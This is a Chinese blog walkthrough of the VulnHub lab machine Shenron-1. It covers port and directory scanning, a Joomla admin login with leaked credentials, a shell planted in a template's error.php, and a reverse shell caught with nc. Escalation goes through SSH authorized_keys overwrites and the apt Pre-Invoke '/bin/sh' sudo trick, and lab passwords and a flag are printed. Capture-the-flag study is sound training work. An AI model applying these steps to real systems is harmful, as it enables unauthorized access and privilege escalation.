Vulnhub-shenron-1

最新推荐文章于 2023-07-10 15:02:11 发布
最新推荐文章于 2023-07-10 15:02:11 发布
阅读量1.8k 收藏
点赞数
分类专栏: web安全 文章标签: apache https linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/lionwerson/article/details/122326225
版权

nmap扫描端口:

nmap 192.168.0.19 -p-

https://s4.ax1x.com/2022/01/05/TjpPr6.png

💡 开放80端口和22端口

web浏览器打开80端口:

https://s4.ax1x.com/2022/01/05/Tjppx1.png

💡 Apache服务的默认页面

web扫描器识别到是joomla框架:

https://s4.ax1x.com/2022/01/05/TjpkVO.png

gobuster扫描joomla后台路径:

gobuster.exe  dir -u http://192.168.0.19/joomla/ -w dir.txt

https://s4.ax1x.com/2022/01/05/TjpZPH.png

💡 后台路径是joomla/administrator/index.php

https://s4.ax1x.com/2022/01/05/TjpeGd.png

登录名和密码在/test/password文件的源码中:

https://s4.ax1x.com/2022/01/05/TjpS2R.png

https://s4.ax1x.com/2022/01/05/TjSxPJ.png

管理员是admin,密码是3iqtzi4RhkWANcu@ p a pa pa$

https://s4.ax1x.com/2022/01/05/TjpnxI.png

💡 管理员登录ok

编辑模板文件上传shell:

https://s4.ax1x.com/2022/01/05/Tjpds0.png

💡 编辑完模板文件然后要点击copy template,取个名字就可以保存成功了。

https://s4.ax1x.com/2022/01/05/TjpDdU.png

在error.php中插入shell,这样访问出现错误时,就会自动访问到error.php文件,就可以反弹。

提权:

nc监听端口:

nc.exe -lvvp 1234

访问错误地址反弹nc:

https://s4.ax1x.com/2022/01/05/TjproF.png

https://s4.ax1x.com/2022/01/05/Tjpyi4.png

💡 反弹成功

https://s4.ax1x.com/2022/01/05/Tjp6JJ.png

登录用户是www-data。存在另外两个用户一个是shenron,另一个用户是jenny。

在/var/www/html/joomla/configuration.php存在jenny的密码:

https://s4.ax1x.com/2022/01/05/TjerGV.png

💡 jenny的密码是Mypa$ w o r d i wordi wordinotharD@123

https://s4.ax1x.com/2022/01/05/TjpWsx.png

https://s4.ax1x.com/2022/01/05/Tjm1eJ.png

通过把ssh公钥写入jenny目录下的.ssh文件夹下的authorized_keys中,就可以用私钥登录到jenny。

cd .ssh
echo __public key__ >> authorized_keys
echo ssh-rsa "生成的公钥串" >> authorized_keys

https://s4.ax1x.com/2022/01/05/TjuSKS.png

💡 使用公钥文件登录

https://s4.ax1x.com/2022/01/05/TjubsU.png

💡 jenny登录成功,sudo -l 查看提权命令,jenny可以使用shenron的身份使用cp命令

使用shenron的cp命令替换.ssh文件夹下的authorized_keys,替换成jenny的公钥,这样就可以用jenny的私钥登录到shenron用户。

cp /home/jenny/.ssh/authorized_keys /tmp/  #复制jenny的authorized_keys文件到/tmp/两个用户都可以读取
sudo -u shenron cp /tmp/authorized_keys /home/shenron/.ssh/

https://s4.ax1x.com/2022/01/05/TjMe74.png

https://s4.ax1x.com/2022/01/05/TjQ9bD.png

https://s4.ax1x.com/2022/01/05/TjMfCn.png

https://s4.ax1x.com/2022/01/05/TjQE8I.png

💡 shenron用户的密码在/var/opt/password.txt

sudo apt update -o APT::Update::Pre-Invoke::=/bin/sh #使用apt命令提权

https://s4.ax1x.com/2022/01/05/TjQmKf.png

https://s4.ax1x.com/2022/01/05/TjQl5j.png

💡 Your Root Flag Is Here :- aa087b2d466cd593622798c8e972bffb

下载地址:

https://www.vulnhub.com/entry/shenron-1,630/

lionwerson
关注
专栏目录
vulnhub--shenron: 3
venu_s的博客
08-12 506
靶机介绍 Goal: Get two flags Difficult: Beginner Download:https://www.vulnhub.com/entry/shenron-3,682/ 信息探测 主机发现 netdiscover -i eth0 -r 192.168.187.0/24 端口扫描 nmap -sV -p- -A 192.168.187.176 目录扫描 gobuster dir -u http://192.168.187.176 -x "php,txt,zip,b
shenron-3 靶机wp
m0_52496313的博客
09-14 601
shenron-3 靶机wp
Vulnhub靶机——SHENRON: 1
qq_51295120的博客
02-20 3982
靶机下载链接在这 1. 主机发现: VMware和VirtualBox进行互通: 靶机:VirtualBox管理器中靶机网卡一设置桥接网卡,网卡二设置仅主机模式 kali:设置桥接模式即可 识别存活的主机,发现攻击的目标: netdiscover -r 172.16.10.0/24 -i eth0 目标服务器为172.16.10.124 2.信息收集 使用nmap进行全端口服务版本扫描: 靶机服务器只开启了22和80端口。 3. 渗透测试 ssh进行密码爆破时发现不能使用密码登录,只能私钥进行访
Vulnhub-shenron-1:神龙1靶机渗透攻略
weixin_47311099的博客
01-20 1251
下载地址:http://www.vulnhub.com/entry/shenron-1,630/ 虚拟化环境virtualbox 目标:获取两个flag ​ 信息收集 nmap扫描 nmap -sC -sV 192.168.210.181 发现80http ,22ssh ![image.png](https://img-blog.csdnimg.cn/img_convert/f850d2f9e663b06b6f03af1f42bedae3.png#clientId=u9ae3eb84-40cb-4&
SHENRON-1(神龙靶机)
m0_66299232的博客
09-29 752
就是为了让两个linux机器之间使用ssh不需要用户名和密码。常规我们ssh连接到其他服务器的时候是需要输入密码的,这个文件中可以实现你的免密登录连接,只需要两步操作:1、在要被连接的目标服务器上生成 ssh 公钥 xxx.pub2、将远程服务器上生成的 xxx.pub 中的内容,拷贝到当前服务器的 ~/.ssh/authorized_keys 中这样再进行 ssh 连接目标服务器的时候,就不会提示输入密码了,结果是直接连接成功生成公私钥(2)创建公私钥。
看完这篇 教你玩转渗透测试靶机Vulnhub——The Planets:Venus
最新发布
Aluxian_的博客
07-10 793
vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。这是一个漏洞靶机,老样子需要找到flag即可。这个靶机难度中等吧1.信息收集获取ip地址 和端口信息web等 查看F12源码信息2.替换Cookie值 进行解密Base64和Rot13解密3.漏洞得利用(漏洞很强大!4.缓冲区溢出提权(参考大佬wp 比较难 不太会)系列完结啦,学习到了很多知识点又是收获满满的一天(耶耶耶!
game-in1-rawi-olavM
04-07
该游戏是基于鹿特丹Emmauscollege的4HV模板 我的游戏:游戏名称 由...制作: 奥拉夫v迈登 拉威·比达尔(Rawi ... NPC的列表:BHead(重设世界),Shenron(如果您将7个特殊物品放在一起,他会给他一个愿望),Liqu
DBS TCG Quick Search-crx插件
04-04
在CardMarket或TCGPlayer上搜索卡,即可快速访问Meta Decks,DBS Decks主页和Shenron的Lair DB。 将卡名称放在搜索栏上,然后按Enter键,您将被重定向到CardMarket(EU)或TCGPlayer(USA / CA / NZ / AU)。 按DBS ...
Vulnhub-Moneybox
GALi_233的博客
07-23 1134
Description 本次靶机来自vulnhub MONEYBOX 1 。靶机中存在3个flag,本次目标是拿到这3个flag,废话不多说开始把吧。 扫描与服务识别 靶机与Kali处在同一网段,通过二层扫描(arp-scan)同网段的存活IP sudo arp-scan -I eth0 -l # -I 网卡 -l 本地网络 通过判断,192.168.54.250为靶机地址。 扫描该靶机的开放端口 sudo nmap -p- 192.168.54.250 发现21,22,80端口,对这些端口进
Vulnhub系列】Mr.root
大方子
12-05 3153
靶机下载地址:https://download.vulnhub.com/mrrobot/mrRobot.ova.torrent 这次靶机的名称是Mr.root kali:192.168.100.8 Win7:192.168.100.9 ==============================================================================...
jenkins的admin用户的初始密码路径
热门推荐
qq_34597155的博客
11-23 3万+
jenkins的admin用户的初始密码路径 cat /var/lib/jenkins/secrets/initialAdminPassword
Vulnhub 靶机实战系列:DC -3网站管理员账号密码和系统提权
weixin_50815573的博客
03-03 4618
Vulnhub 靶机实战系列:DC -3网站管理员账号密码和系统提权 搭建测试靶机 下载地址:DC: 3.2 ~ VulnHub 则靶机DC-3 ip:192.168.1.106(NAT连接) 攻击机kali linux ip:192.168.1.237 信息收集 使用:nmap -sP 192.168.0.0/24 进行扫描找到目标靶机 对目标靶机进行端口扫描 利用nmap对目标主机进行端口扫描,发现开放端口:80 使用命令:nmap -A -p- -T4 192.168.1.106
Fawkes(vulnhub)
wcl20010的博客
05-29 1174
HarryPotter: Fawkes ~ VulnHub 此靶机难度高 目录 1.主机发现 2. 端口扫描 3.漏洞发现 Ftp 4.缓冲区溢出 使用edb调试server_hogwarts 攻击思路: 确定溢出位置: 5.反弹shell 构造exp 拿下靶机shell 升级shell 6.提权(信息收集) 信息收集 流量分析 提权 漏洞检测 漏洞利用 找网上的exp测试 ​编辑 执行 1.主机发现 arp-scan -l 2. 端口扫描
vulnhub靶场之DC-3渗透教程(Joomla CMS)
旺仔Sec&blog
06-06 1364
靶机下载链接作者DCAU发布日期2020年4月25日难度中等1、这个靶场主要考了Joomla的cms框架,然后就是一个外部的提权文件来进行提权2、因此还是得要多熟悉一下常用的cms,说实话,这个上传点还找了蛮久的哈哈哈3、希望有不足之处,欢迎各位师傅点评一下!
Vulnhub 靶机 VulnOSv2 write up opendocman cms 32075 sql注入 账号密码 ssh连接 37292.c 脏牛提权
YouthBelief的博客
12-05 2363
VulnOSv2 write up0x00 环境搭建0x01 信息收集0x02 漏洞挖掘web思路步骤一:枚举目录+主页挖掘步骤二:OpenDocMan v1.2.7 cms利用步骤三:尝试利用账号面ssh连接webmin0x03 提权步骤四:内核漏洞提权0x04 总结 0x00 环境搭建 VritualBox配置网络为 host-only VMware中kali加入 host-only 为Virtual Box的网卡 开启虚拟机报错 usb 2.0 什么的问题 修改usb设备为1.0 0x01 信息
Vulnhub靶机渗透测试实战(一):DC-1(入门)
weixin_41038469的博客
03-11 2万+
关于Vulnhub Vulnhub是一个特别好的渗透测试实战网站,提供了许多带有漏洞的渗透测试虚拟机下载。 新手入门DC-1: 下载地址: https://www.vulnhub.com/entry/dc-1-1,292/ 主机渗透系统: macOS10.13 安装好虚拟机后挂载Virtualbox运行 第一次进行渗透实战演练,打开虚拟机后发现需要登录密码,一脸懵逼。翻查网页上的介绍才知道,就是不...
记一次vulnhub|渗透测试 DC-9
crispr的博客
01-15 2608
vulnhub DC-9 0X01 Main Point 1.Sqlmap的基本使用 2.LFI的利用 3.Port Knocking–端口敲门服务 4.hydra的基本使用–爆破ssh 5.sudo权限的枚举 0X02 前期嗅探和端口探测 kali下使用arp-scan获取靶机IP 得到靶机IP 172.20.10.10, nmap探测靶机开放的端口服务; 靶机开放了80和22端...
Vulnhub靶场渗透测试系列DC-3(Joomla CMS漏洞和Ubuntu16.04漏洞)
qq_45722813的博客
12-07 3079
Vulnhub靶场渗透测试DC-3 靶机下载地址:https://www.five86.com/dc-3.html 攻击机为kali2021,IP地址:192.168.172.131 将靶机导入到VMware,设置网络模式为NAT模式,开启靶机虚拟机 在kali攻击机使用nmap进行存活主机发现来获取靶机IP地址,命令nmap -T4 -Pn 192.168.172.1/24 但是发现没有扫描到靶机IP,可能是靶机网络设置问题,参考文章:https://editor.csdn.net/md/?artic
VulnHub靶场Nezuko 1.0为例总结红队套路(1)
qq_29566629的博客
02-18 517
前言: Vulnhub简介 Vulnhub是一个提供各种漏洞环境的靶场平台,供安全爱好者学习渗透使用,大部分环境是做好的虚拟机镜像文件,镜像预先设计了多种漏洞,需要使用VMware或者VirtualBox运行。每个镜像会有破解的目标,大多是Boot2root,从启动虚机到获取操作系统的root权限和查看flag。网址:https://www.vulnhub.com。 靶场说明 Nezuko1.0 是一个难度为中等的Boot2root/CTF挑战,由@yunaranyancat (Twitter)制作 描述:
[VulnHub靶机]Lin.Security_linux提权
qq_45927819的博客
03-15 2419
靶机描述 在in.security,我们希望开发一个Linux虚拟机,该虚拟机在编写本文时基于最新的Ubuntu发行版(18.04 LTS),但存在许多漏洞,这些漏洞使用户无法升级扎根在盒子上。旨在帮助理解某些内置应用程序和服务(如果配置错误)可能会被攻击者滥用。 首先,您可以使用以下凭据登录主机:bob / secret 下载地址:https://in.security/downloads/lin.security_v1.0.ova 靶机IP:192.168.56.106 直接ssh连接: ssh bob
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值